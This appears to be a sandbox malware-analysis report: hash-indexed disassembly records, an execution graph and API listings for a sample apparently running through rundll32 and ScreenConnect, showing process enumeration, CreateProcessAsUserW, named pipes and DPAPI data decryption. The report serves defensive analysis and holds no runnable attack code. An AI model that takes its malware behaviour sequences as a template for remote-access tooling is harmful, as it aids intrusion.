                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 365c5cd45c8aa97631548259a4d679649619328d79eb88dbca8b60bbd206cabf
                                                                                    • Instruction ID: 7c71aa2e9693d9b1f0ea45f8909b784d558f4e32006efc21d8613e9b7583f247
                                                                                    • Opcode Fuzzy Hash: 365c5cd45c8aa97631548259a4d679649619328d79eb88dbca8b60bbd206cabf
                                                                                    • Instruction Fuzzy Hash: 5C0126317183408BC31297A9AC914AF7FE6EFC6624305816FE555CF241DE649C058BE6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b49ecf24feeecf72a317196eff96a0539d417183bb2b59ee523fb0d44bb6e6e8
                                                                                    • Instruction ID: 5c6b5d8272032fe3c04aea38d2036dc9d08834eed05b1e37d8dcc0a579c22763
                                                                                    • Opcode Fuzzy Hash: b49ecf24feeecf72a317196eff96a0539d417183bb2b59ee523fb0d44bb6e6e8
                                                                                    • Instruction Fuzzy Hash: 02018439F0111C8BEF989A69DC217EEB7FAAF89314F148039C505F7254DB358A41CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a16d12a8069af32e7e3d54ec893e71ddb571f56c29670afc3e12216ad901ec80
                                                                                    • Instruction ID: 030223c6139f083315e5acfecd6b88c23cf8b293fff1bdf8516394ea0228c5ef
                                                                                    • Opcode Fuzzy Hash: a16d12a8069af32e7e3d54ec893e71ddb571f56c29670afc3e12216ad901ec80
                                                                                    • Instruction Fuzzy Hash: 4701B530B001149BEBA8AA69C8557AF7AE7AFC9304F14847DD416F7380DE758D46C7D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d30bb06c72ae570a83c81e3d101cac1b427835458ae58bc06fa70ac484f37753
                                                                                    • Instruction ID: 3c45db92fbf3245eb4493f2b4c48ff1fc17dfaeea8ba1b57e8686958164dbbd1
                                                                                    • Opcode Fuzzy Hash: d30bb06c72ae570a83c81e3d101cac1b427835458ae58bc06fa70ac484f37753
                                                                                    • Instruction Fuzzy Hash: AC01D635B0051957EB98AA68985A7FF7AFBDBC9700F14446DD512F7380CEB54C0187E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a25bd1a4085b31600facd5a60ea11f6d2d3b6d4d9bc4aff984249be2041f2037
                                                                                    • Instruction ID: f255fa35a3d7eb22b2f4aae79f03efb889ddcb4d5907f40012436a0fce6ce93f
                                                                                    • Opcode Fuzzy Hash: a25bd1a4085b31600facd5a60ea11f6d2d3b6d4d9bc4aff984249be2041f2037
                                                                                    • Instruction Fuzzy Hash: 4D01D430A153059FE7999FB9A43572E3FDAEFC241870908BAD689CB251FE35D804C381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.1575857411.00000000040ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 040ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40ed000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51d98fe971894928706e65cb16a1a984d85e163049fb026abcd40639046cea70
                                                                                    • Instruction ID: 95537b45bc9b532a6b8de31e014a706a9f4b00a102c7b5f23f363597d2cab2bd
                                                                                    • Opcode Fuzzy Hash: 51d98fe971894928706e65cb16a1a984d85e163049fb026abcd40639046cea70
                                                                                    • Instruction Fuzzy Hash: 8601F771504305AEE7604E26E884B77BBC8EF81724F1CC01ADD182F242C279A441CAB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.1575857411.00000000040ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 040ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40ed000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: edac3783168522a8c851087f61bf5b374ced5c2ad42481de744b6317ca588163
                                                                                    • Instruction ID: f3da86cdc99e2f31f7376e38975fbfbadf71d37263957a40a5eab1f5cc568537
                                                                                    • Opcode Fuzzy Hash: edac3783168522a8c851087f61bf5b374ced5c2ad42481de744b6317ca588163
                                                                                    • Instruction Fuzzy Hash: 06015E6100E3C09FE7129B259D94B62BFB4DF43224F1D81DBD9889F1A3C2695849CB72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b9890e5e39a2c597b6254b8168b7766a094bc39871fd707947235d4e61dfe2f
                                                                                    • Instruction ID: a531288f56d8f013878ecae6323412b71ac43ea2d3e18594bc2f50b5bf670236
                                                                                    • Opcode Fuzzy Hash: 7b9890e5e39a2c597b6254b8168b7766a094bc39871fd707947235d4e61dfe2f
                                                                                    • Instruction Fuzzy Hash: 3801DF30B002149BEBA8AA6AC8147AF7AE69FCA304F24806DD406F7380DFB58C4587D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 943c19928d21fe81bfbe69b4fa78e7b006a39b80c6daedcea4c7d3ba267b4265
                                                                                    • Instruction ID: d686bba6823254b060e0b08596a73e1f69f4e2f4733834d1009e04da6255d36a
                                                                                    • Opcode Fuzzy Hash: 943c19928d21fe81bfbe69b4fa78e7b006a39b80c6daedcea4c7d3ba267b4265
                                                                                    • Instruction Fuzzy Hash: 35F05931B0431093DB64656A98C4B7E659A9FC5650F04902AEA0DC33C0EEA98801C191
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9a6f14a752593e2e1a885ce3c549b20ea628ee44b639754f33b8a84849deb38c
                                                                                    • Instruction ID: 7806e85eedd17e0afb51cd92ac3c5c76df2c88a3345d2c74e73c6e29656630d7
                                                                                    • Opcode Fuzzy Hash: 9a6f14a752593e2e1a885ce3c549b20ea628ee44b639754f33b8a84849deb38c
                                                                                    • Instruction Fuzzy Hash: 9DF0A7317103004B831296AEFD519EFBFDAEFC9960300922AE60ACB310DF70AC059BE0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e322a037c0c2006fbf893862f34d61b2a32e30182ef72187f39a66352d96d53d
                                                                                    • Instruction ID: fa5ab4888ff4c85e907e863975f324564bcbde4f647cfc32f7cd5a9b679d7114
                                                                                    • Opcode Fuzzy Hash: e322a037c0c2006fbf893862f34d61b2a32e30182ef72187f39a66352d96d53d
                                                                                    • Instruction Fuzzy Hash: B6F0A030A256640AEBB911688C203AE7A9D0B43614F0000ABE942D7793D9C89A0613E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f200c2bcdfe05dc402e78ed345c40a6bb7a3cf1a57855efc1cde6b4b1dc6029e
                                                                                    • Instruction ID: c60f0635f326dec8daf99c1f7a47f856cd6e3bb2d3001f597bae66eff8d0fdcc
                                                                                    • Opcode Fuzzy Hash: f200c2bcdfe05dc402e78ed345c40a6bb7a3cf1a57855efc1cde6b4b1dc6029e
                                                                                    • Instruction Fuzzy Hash: CDF06270A102059FE7889FB9E03576E3BD6EFC2518B09087AC149CF251FE359800C781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f12cc5c884ae00b0b9f9262fee1511520c7587c94a6d115175bb5b70ee2a9702
                                                                                    • Instruction ID: bafc577b4b9b4b703deb8bcfcf17381b66b176fe630f62eeff3ef08435dad535
                                                                                    • Opcode Fuzzy Hash: f12cc5c884ae00b0b9f9262fee1511520c7587c94a6d115175bb5b70ee2a9702
                                                                                    • Instruction Fuzzy Hash: 28F0E5327083408FD3069666EC5069BBF66DFCA228F1840BBD54CDB362DD365C06C7A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b2bf38fdb02ed7945222158d59c438de33137d6acd407a9dc1709368d88d48d
                                                                                    • Instruction ID: 185c6a5d51b59d5e3f411aa8c1087b3aa4d2a017bbd6a68b62694088dd5709bc
                                                                                    • Opcode Fuzzy Hash: 1b2bf38fdb02ed7945222158d59c438de33137d6acd407a9dc1709368d88d48d
                                                                                    • Instruction Fuzzy Hash: 91E09230B6062806FFF821699C603BE348D4B83614F00046AE506D2A82D9D8EA411393
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78572085ba280344e6602e95d009e24a644b38638102f6e029be5cad47a4f438
                                                                                    • Instruction ID: a6509bd302009cb18c4e41cf2255673f30ea887ca562f59b14e863e7fb73060e
                                                                                    • Opcode Fuzzy Hash: 78572085ba280344e6602e95d009e24a644b38638102f6e029be5cad47a4f438
                                                                                    • Instruction Fuzzy Hash: 3FE0D87050634CAFC701DFB8EC118EDBFF9DB46204B0151E6E808D7241EA315F0487A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90312f07752565febe68f2811d807855b6850bf90d2fcd182d16cadcb0a6c35a
                                                                                    • Instruction ID: 60fb6edc0fae57ad5549789dfddd454c5ca8c9d46c9876d67e8e76a641acf5bc
                                                                                    • Opcode Fuzzy Hash: 90312f07752565febe68f2811d807855b6850bf90d2fcd182d16cadcb0a6c35a
                                                                                    • Instruction Fuzzy Hash: E1E026327002048BC308992AE8409ABB7AADBC9228B24407AE50CD3315CD32AC068690
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a6dc90f32e7bbec9bf33782b06782d5430d115cb2df03901378a5a8b972e275
                                                                                    • Instruction ID: 21860ea3b52897afb75175636c305bc0bf0db837570a3909aa803481b04e5b9b
                                                                                    • Opcode Fuzzy Hash: 6a6dc90f32e7bbec9bf33782b06782d5430d115cb2df03901378a5a8b972e275
                                                                                    • Instruction Fuzzy Hash: 6AD02E21A2B3602BCB6023B428282EBBF6CDB43110F0400D6EE28CB207C9BD4C1203D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f0514749ded7044d87a69e26ef9d29ff0aa304775c027c86ead134a81988e644
                                                                                    • Instruction ID: 49583b60c090e2623f63b2c5a428720990f45a074dd4684495a3db9a106c5721
                                                                                    • Opcode Fuzzy Hash: f0514749ded7044d87a69e26ef9d29ff0aa304775c027c86ead134a81988e644
                                                                                    • Instruction Fuzzy Hash: F4E02B3221D2904FC3121B24E8550E97FB4DB2B01130800ABE880C7762DEA20D55C7E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8674dccbab78bd5ea30e6e989e2156e93e4486e3cd2a9e6f93662c8145b9bc48
                                                                                    • Instruction ID: 0112a1e5ca5c326bfe41ab0a74e0e55ead4e438617bce91c4d873f3683427acd
                                                                                    • Opcode Fuzzy Hash: 8674dccbab78bd5ea30e6e989e2156e93e4486e3cd2a9e6f93662c8145b9bc48
                                                                                    • Instruction Fuzzy Hash: F0E04F30900108DBDB40EBE4EA1529D7BB2EBC8204F009A69D419A7640EE315A10DBC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a64bd4e760c0b45d195e0324a722342cb94c353aba5103c18e446f6a237ef8f
                                                                                    • Instruction ID: ba91bd8385ed21380f95df6da7344799d6074984191b4f7826709bb7958e5fd5
                                                                                    • Opcode Fuzzy Hash: 0a64bd4e760c0b45d195e0324a722342cb94c353aba5103c18e446f6a237ef8f
                                                                                    • Instruction Fuzzy Hash: 0BD0A73231013C6B6750665CDC4A9AE77A9E786661350443BF901C3610DE707C5187D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0531a3850abffa9b0d50e30a87573b556ea86705f07862685729d6bfde289fc4
                                                                                    • Instruction ID: d15e52c5a0609466859789739d5d85fc30534d467bff0ecf581c74814163c6de
                                                                                    • Opcode Fuzzy Hash: 0531a3850abffa9b0d50e30a87573b556ea86705f07862685729d6bfde289fc4
                                                                                    • Instruction Fuzzy Hash: FAD01770A0020CEFCB40DFE8EA115ADBBF9EB88204B1056A9D809E7600EE312E009B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5442c9c7a3f9d740d004b4b1f4268feef79c9c29c430cdda4b1538e00acb6132
                                                                                    • Instruction ID: 0edf328a557d4297a5f8ebaaebdfcdff9dcd65be74c8fe6455bec41baf11e3e2
                                                                                    • Opcode Fuzzy Hash: 5442c9c7a3f9d740d004b4b1f4268feef79c9c29c430cdda4b1538e00acb6132
                                                                                    • Instruction Fuzzy Hash: 2BD05E70A0120CEFCB40EFF8E9025ADBBF9EF48204B1045A9E809E3200FE316F049B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000003.1574938117.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_3_68e0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7eef1bc640e6e9bf2ecb77bf59765163bd086efe866f59c09c38c3318ffdf91
                                                                                    • Instruction ID: e0aba7e5ff2937f56d83f034e96de5dbf7de99f9aea910c2587237bfe95772ab
                                                                                    • Opcode Fuzzy Hash: f7eef1bc640e6e9bf2ecb77bf59765163bd086efe866f59c09c38c3318ffdf91
                                                                                    • Instruction Fuzzy Hash: 64C08C76EA46008BE248868400056EEB3A0FB3132AB8880BB810449111622E04239821

                                                                                    Execution Graph

                                                                                    Execution Coverage:13.4%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:7.4%
                                                                                    Total number of Nodes:95
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph 38327 51b2c98 38328 51b2cec ConnectNamedPipe 38327->38328 38329 51b2d28 38328->38329 38329->38329 38330 51b0040 38331 51b0071 38330->38331 38339 51b0be0 38331->38339 38332 51b00c7 38334 51b0207 38332->38334 38345 51b1370 38332->38345 38349 51b135f 38332->38349 38333 51b0a4e 38333->38333 38353 51b2ebe 38334->38353 38340 51b0c14 38339->38340 38342 51b0c5c 38340->38342 38361 51a5e18 38340->38361 38369 51a5e28 38340->38369 38341 51b0cec 38342->38332 38346 51b137f 38345->38346 38412 51b13d0 38346->38412 38350 51b1370 38349->38350 38352 51b13d0 2 API calls 38350->38352 38351 51b1394 38351->38334 38352->38351 38354 51b2ede 38353->38354 38356 51b2ef7 38354->38356 38425 51b3010 38354->38425 38429 51b3020 38354->38429 38355 51b2f20 38359 51b3010 WaitNamedPipeW 38355->38359 38360 51b3020 WaitNamedPipeW 38355->38360 38356->38333 38359->38356 38360->38356 38362 51a5e4c 38361->38362 38363 51a5e5c 38361->38363 38364 51a5e55 38362->38364 38365 51a63b0 4 API calls 38362->38365 38366 51a63a0 4 API calls 38362->38366 38377 51a63a0 38363->38377 38384 51a63b0 38363->38384 38364->38341 38365->38362 38366->38362 38371 51a5e5c 38369->38371 38372 51a5e4c 38369->38372 38370 51a5e55 38370->38341 38375 51a63b0 4 API calls 38371->38375 38376 51a63a0 4 API calls 38371->38376 38372->38370 38373 51a63b0 4 API calls 38372->38373 38374 51a63a0 4 API calls 38372->38374 38373->38372 38374->38372 38375->38372 38376->38372 38378 51a63aa 38377->38378 38379 51a63d5 38378->38379 38391 51a6530 38378->38391 38398 51a6520 38378->38398 38380 51a63de 38379->38380 38405 51a5fd0 38379->38405 38380->38362 38385 51a63d5 38384->38385 38386 51a63e5 38384->38386 38387 51a63de 38385->38387 38388 51a5fd0 ProcessIdToSessionId 38385->38388 38389 51a6530 2 API calls 38386->38389 38390 51a6520 2 API calls 38386->38390 38387->38362 38388->38385 38389->38385 38390->38385 38396 51a655a 38391->38396 38397 51a6547 38391->38397 38392 51a6550 38392->38379 38393 51a66c2 K32EnumProcesses 38394 51a66fa 38393->38394 38394->38379 38396->38397 38408 51a5fdc 38396->38408 38397->38392 38397->38393 38403 51a6530 38398->38403 38399 51a6550 38399->38379 38400 51a66c2 K32EnumProcesses 38401 51a66fa 38400->38401 38401->38379 38402 51a5fdc K32EnumProcesses 38402->38403 38403->38402 38404 51a6547 38403->38404 38404->38399 38404->38400 38406 51a6760 ProcessIdToSessionId 38405->38406 38407 51a67d3 38406->38407 38407->38379 38409 51a6670 K32EnumProcesses 38408->38409 38411 51a66fa 38409->38411 38411->38396 38413 51b140b 38412->38413 38417 51b2640 38413->38417 38421 51b2639 38413->38421 38414 51b14d9 38418 51b2693 CreateProcessAsUserW 38417->38418 38420 51b2724 38418->38420 38420->38414 38422 51b2693 CreateProcessAsUserW 38421->38422 38424 51b2724 38422->38424 38424->38414 38427 51b302d 38425->38427 38428 51b3064 38427->38428 38433 51b1f6c 38427->38433 38428->38355 38432 51b302d 38429->38432 38430 51b1f6c WaitNamedPipeW 38430->38432 38431 51b3064 38431->38355 38432->38430 38432->38431 38434 51b3088 WaitNamedPipeW 38433->38434 38436 51b3104 38434->38436 38436->38427 38441 51bfb60 38443 51bfbbe 38441->38443 38442 51bfc33 CreateFileA 38444 51bfc95 38442->38444 38443->38442 38443->38443 38437 3a416f8 38438 3a41740 CryptProtectData 38437->38438 38439 3a4173a 38437->38439 38440 3a41783 38438->38440 38439->38438

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 474 51b2640-51b2691 475 51b269c-51b26a0 474->475 476 51b2693-51b2699 474->476 477 51b26a8-51b26bd 475->477 478 51b26a2-51b26a5 475->478 476->475 479 51b26cb-51b2722 CreateProcessAsUserW 477->479 480 51b26bf-51b26c8 477->480 478->477 481 51b272b-51b2753 479->481 482 51b2724-51b272a 479->482 480->479 482->481
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 051B270F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 55ba856c7ff3daf7fd3a7fd8c0ae106485d0f9f9053d2a67ac77fa41319e7f24
                                                                                    • Instruction ID: 6886fe95aa6c615d3cbc4290ee9fe7afb8413295d784b60ba92c5b88dc2727de
                                                                                    • Opcode Fuzzy Hash: 55ba856c7ff3daf7fd3a7fd8c0ae106485d0f9f9053d2a67ac77fa41319e7f24
                                                                                    • Instruction Fuzzy Hash: 26413376900209DFDF10CFAAC880ADEBBF6FF48310F14842AE928A7250D775A955CF90
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03A4176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2814154500.0000000003A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_3a40000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: afade254fc5af48b9cad70bd3961d886ea556961f6b9b0d23974e0f7c08b9d41
                                                                                    • Instruction ID: 98b5bc6c4bdc636c09f22db50c6be8e855ce30b974e137bbab197a5b239d285c
                                                                                    • Opcode Fuzzy Hash: afade254fc5af48b9cad70bd3961d886ea556961f6b9b0d23974e0f7c08b9d41
                                                                                    • Instruction Fuzzy Hash: 8E212876800249DFDB10CF9AC844BDEBBF1FF88310F14852AE919A7211C379A555CFA1
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03A4176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2814154500.0000000003A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_3a40000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: 20f8b9b8b020a707c17eb7bf0a06ba97714d3f88bd35df5485ed0bf8c1628aaa
                                                                                    • Instruction ID: 4010e2a531aa9a6cd175c0272eee14e7eae3a27ea41ad0901572e3b1351beaa0
                                                                                    • Opcode Fuzzy Hash: 20f8b9b8b020a707c17eb7bf0a06ba97714d3f88bd35df5485ed0bf8c1628aaa
                                                                                    • Instruction Fuzzy Hash: 852104B6800249DFDB10CF9AC844ADEBBF5FF88310F14841AE929A7251C379A555CFA1
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2DD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 086871d34db8b01d6f9101d66bbb068e80d3c9513885498e8cd11cb1a2b6f867
                                                                                    • Instruction ID: e8cc260689a6297a5c67043201fb814f3a0ed4a332958883ac6191436365ff93
                                                                                    • Opcode Fuzzy Hash: 086871d34db8b01d6f9101d66bbb068e80d3c9513885498e8cd11cb1a2b6f867
                                                                                    • Instruction Fuzzy Hash: 0621567A800249DFDB11CF9AC845BDEBBF4EF48320F148419E924A7251D339A555CFA1
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2DD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 54e2e874a0bab63562ab3986cbee634b1fa5e23263db50c1dbcd016adab0417d
                                                                                    • Instruction ID: fcc2176619150ce76268ef2138b6fdb29bdfe52ffb4b7ce56c68fd58e8608683
                                                                                    • Opcode Fuzzy Hash: 54e2e874a0bab63562ab3986cbee634b1fa5e23263db50c1dbcd016adab0417d
                                                                                    • Instruction Fuzzy Hash: 64212676800249DFDF10CF9AC845BDEBBF4EF48320F148419E924A7251C339A555DFA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
